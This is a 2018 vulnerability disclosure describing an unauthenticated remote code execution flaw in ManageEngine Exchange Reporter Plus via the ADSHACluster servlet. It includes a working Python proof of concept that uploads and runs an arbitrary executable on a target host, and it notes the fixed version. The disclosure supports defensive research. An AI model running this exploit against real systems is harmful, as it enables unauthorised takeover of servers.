28-06-2018 / Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

Introduction

How to create a Metasploit module in example? YouTube video

[PL] Jak stworzyć moduł do #Metasploit? Poradnik na YouTube

Java servlet ADSHACluster takes two parameters: BCP_RLL and BCP_EXE.

Received data are converted from hex encoding and save inside bin directory.

That's the way how bcp.rll and bcp.exe files are created.

Then exe file is executed using exec("cmd /c bcp.exe -?").

POC

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

Metasploit module

import urllib
file_to_execute = "calc.exe"
ip = "192.168.1.105" 
def to_hex(s):
    lst = []
    for ch in s:
        hv = hex(ord(ch)).replace('0x', '')
        if len(hv) == 1:
            hv = '0'+hv
        lst.append(hv)
    return reduce(lambda x,y:x+y, lst)
print "ManageEngine Exchange Reporter Plus <= 5310"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek"
params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())})
f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params)
if '{"STATUS":"error"}' in f.read():
	print "OK"
else:
	print "ERROR"

Timeline

  • 28-06-2018: Version 5311 released
  • 28-06-2018: Release